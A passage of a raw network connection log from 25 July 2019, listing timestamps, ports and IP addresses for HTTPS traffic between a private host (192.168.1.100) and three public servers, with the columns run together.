              Jul 25, 2019 13:47:01.726039886 MESZ55366443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:01.726314068 MESZ55366443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:01.728210926 MESZ55366443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:01.739303112 MESZ55366443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:01.740895033 MESZ44355366104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:01.741072893 MESZ55366443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:01.751576900 MESZ44355366104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:01.982475042 MESZ55368443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:01.995028973 MESZ44355368104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:01.995361090 MESZ55368443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:02.165458918 MESZ55368443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:02.177828074 MESZ44355368104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:02.180916071 MESZ44355368104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:02.180975914 MESZ44355368104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:02.181005955 MESZ44355368104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:02.181123018 MESZ55368443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:02.183378935 MESZ55368443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:02.235707045 MESZ44355368104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:02.235918045 MESZ55368443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:02.248428106 MESZ44355368104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:02.249106884 MESZ44355368104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:02.254519939 MESZ55368443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:02.276432991 MESZ44355368104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:02.276453972 MESZ44355368104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:02.276849031 MESZ55368443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:02.277432919 MESZ55368443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:02.288778067 MESZ55368443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:02.294941902 MESZ44355368104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:02.295099020 MESZ55368443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:02.301127911 MESZ44355368104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:02.694180965 MESZ55370443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:02.706717968 MESZ44355370104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:02.706871986 MESZ55370443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:02.869569063 MESZ55370443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:02.882278919 MESZ44355370104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:02.886641979 MESZ44355370104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:02.886667013 MESZ44355370104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:02.886678934 MESZ44355370104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:02.886842012 MESZ55370443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:02.890301943 MESZ55370443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:02.944470882 MESZ44355370104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:02.944647074 MESZ55370443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:02.957098007 MESZ44355370104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:02.958178997 MESZ44355370104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:02.978324890 MESZ55370443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:03.015974045 MESZ44355370104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:03.016006947 MESZ44355370104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:03.016015053 MESZ44355370104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:03.016057014 MESZ55370443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:03.016160965 MESZ44355370104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:03.016376019 MESZ55370443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:03.016804934 MESZ55370443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:03.025897026 MESZ55370443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:03.029210091 MESZ44355370104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:03.029493093 MESZ55370443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:03.038364887 MESZ44355370104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:03.107364893 MESZ54582443192.168.1.100140.82.118.4
              Jul 25, 2019 13:47:03.134943962 MESZ44354582140.82.118.4192.168.1.100
              Jul 25, 2019 13:47:03.135241985 MESZ54582443192.168.1.100140.82.118.4
              Jul 25, 2019 13:47:03.264714956 MESZ54582443192.168.1.100140.82.118.4
              Jul 25, 2019 13:47:03.293453932 MESZ44354582140.82.118.4192.168.1.100
              Jul 25, 2019 13:47:03.293663025 MESZ54582443192.168.1.100140.82.118.4
              Jul 25, 2019 13:47:03.293700933 MESZ44354582140.82.118.4192.168.1.100
              Jul 25, 2019 13:47:03.293775082 MESZ44354582140.82.118.4192.168.1.100
              Jul 25, 2019 13:47:03.293821096 MESZ54582443192.168.1.100140.82.118.4
              Jul 25, 2019 13:47:03.294199944 MESZ54582443192.168.1.100140.82.118.4
              Jul 25, 2019 13:47:03.296320915 MESZ54582443192.168.1.100140.82.118.4
              Jul 25, 2019 13:47:03.381546974 MESZ44354582140.82.118.4192.168.1.100
              Jul 25, 2019 13:47:03.381771088 MESZ54582443192.168.1.100140.82.118.4
              Jul 25, 2019 13:47:03.408793926 MESZ44354582140.82.118.4192.168.1.100
              Jul 25, 2019 13:47:03.408818007 MESZ44354582140.82.118.4192.168.1.100
              Jul 25, 2019 13:47:03.411274910 MESZ54582443192.168.1.100140.82.118.4
              Jul 25, 2019 13:47:03.497514009 MESZ44354582140.82.118.4192.168.1.100
              Jul 25, 2019 13:47:03.935022116 MESZ44354582140.82.118.4192.168.1.100
              Jul 25, 2019 13:47:03.935058117 MESZ44354582140.82.118.4192.168.1.100
              Jul 25, 2019 13:47:03.935080051 MESZ44354582140.82.118.4192.168.1.100
              Jul 25, 2019 13:47:03.935107946 MESZ44354582140.82.118.4192.168.1.100
              Jul 25, 2019 13:47:03.935133934 MESZ44354582140.82.118.4192.168.1.100
              Jul 25, 2019 13:47:03.935230970 MESZ54582443192.168.1.100140.82.118.4
              Jul 25, 2019 13:47:03.935281992 MESZ54582443192.168.1.100140.82.118.4
              Jul 25, 2019 13:47:03.964728117 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:03.974380970 MESZ54582443192.168.1.100140.82.118.4
              Jul 25, 2019 13:47:04.066646099 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.066828966 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:04.217407942 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:04.320420027 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.320637941 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:04.321008921 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.321027040 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.321089983 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:04.321122885 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:04.347954988 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.348011017 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:04.424102068 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.424140930 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.424268007 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:04.424329996 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:04.450562000 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.450825930 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:04.452936888 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:04.555197001 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.555397034 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:04.657601118 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.657639980 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.657655001 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.658267975 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:04.659540892 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:04.726433039 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.726639032 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:04.770095110 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.770134926 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.770164013 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.770188093 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.770258904 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.770272017 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.770297050 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:04.770376921 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:04.770463943 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.770569086 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:04.872616053 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.872667074 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.872692108 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.872714996 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.872736931 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.872760057 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.872787952 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.872814894 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.872883081 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:04.873296022 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:04.974863052 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.974896908 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.974914074 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.974934101 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.974946022 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.974962950 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.975066900 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:04.975157022 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:04.975245953 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.975378990 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:04.976670027 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:04.976783037 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.077395916 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.077457905 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.077486038 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.077526093 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.077553034 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.077584982 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.077598095 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.077617884 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.077649117 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.077754974 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.077820063 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.078867912 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.078915119 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.078999996 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.179723024 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.179785013 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.179811954 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.180114985 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.180146933 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.180185080 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.180214882 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.180242062 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.180406094 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.180475950 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.181155920 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.181191921 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.181705952 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.282766104 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.282821894 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.282852888 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.282886028 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.282919884 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.282952070 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.282954931 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.282984972 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.283015966 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.283068895 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.283782005 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.283817053 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.283885002 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.385727882 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.385773897 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.385799885 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.385826111 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.385850906 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.385885000 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.385894060 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.385919094 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.385919094 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.386002064 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.386030912 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.386209965 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.386267900 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.488270998 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.488358021 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.488400936 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.488426924 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.488456964 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.488481998 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.488507986 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.488521099 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.488533020 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.488557100 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.488581896 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.488711119 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.488790035 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.592264891 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.592305899 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.592331886 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.592355967 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.592405081 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.592436075 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.592477083 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.592509031 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.592519999 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.592538118 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.592566967 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.592650890 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.697192907 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.697232962 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.697257042 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.697278976 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.697308064 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.697335005 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.697499037 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.698240995 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.698302984 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.698332071 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.698374987 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.698405981 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.698432922 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.698446035 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.698571920 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.799637079 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.799686909 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.799714088 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.799741983 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.799767971 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.799793959 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.799844027 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.799943924 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.800643921 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.800679922 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.800769091 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.800909042 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.800934076 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.800988913 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.801024914 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.801039934 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.801655054 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.902048111 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.902079105 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.902105093 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.902128935 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.902237892 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.902250051 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.902266026 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.902578115 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.902920008 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.902942896 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.902960062 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.902976990 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.903044939 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.904124975 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.904155970 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.904257059 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.004326105 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.004360914 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.004375935 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.004390001 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.004511118 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.004631996 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.004664898 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.004719973 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.005136013 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.005155087 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.005168915 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.005203009 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.005258083 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.006325960 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.006355047 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.006443977 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.106791019 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.106827974 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.106848001 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.106865883 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.106889009 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.106909990 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.106944084 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.107009888 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.107104063 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.107491970 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.107520103 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.107539892 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.107561111 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.107640982 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.108652115 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.108752966 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.108793974 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.108829021 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.108906984 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.209182978 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.209227085 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.209244013 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.209259987 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.209280014 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.209296942 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.209312916 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.209477901 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.209711075 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.209737062 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.209752083 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.209789038 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.209820986 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.209883928 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.210997105 MESZ